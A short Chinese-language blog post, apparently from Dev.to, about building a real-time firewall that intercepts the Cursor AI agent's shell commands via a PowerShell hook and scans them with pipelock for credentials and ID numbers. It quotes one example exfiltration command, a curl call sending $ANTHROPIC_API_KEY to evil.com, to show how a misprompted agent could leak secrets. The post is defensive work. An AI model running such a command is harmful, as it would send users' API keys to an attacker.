我如何为 Cursor 构建实时 AI 防火墙

Source: Dev.to

问题

像 Cursor 这样的 AI 编码助手在环境中拥有 Shell 访问权限和你的 API 密钥。一次错误的提示就可能导致你的机密泄露：

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"

一个位于 Cursor 与互联网之间的 Windows Electron 应用：

• Cursor 代理尝试运行 Shell 命令
• PowerShell 钩子在执行前拦截它
• pipelock 扫描命令中的凭证、社会安全号、Aadhaar 号码
• 若匹配规则 → 已阻止
• 实时 UI 在现场显示警报

花了一段时间才发现的 Bug

最难的部分不是安全逻辑——而是 pipelock 接收到的 JSON 前面出现了 n++ 前缀。看到后，修复就很简单：

$start = $raw.IndexOf('{')
if ($start -gt 0) { $raw = $raw.Substring($start) }

结果

亲自尝试

→

使用 pipelock、Electron 和 PowerShell 构建。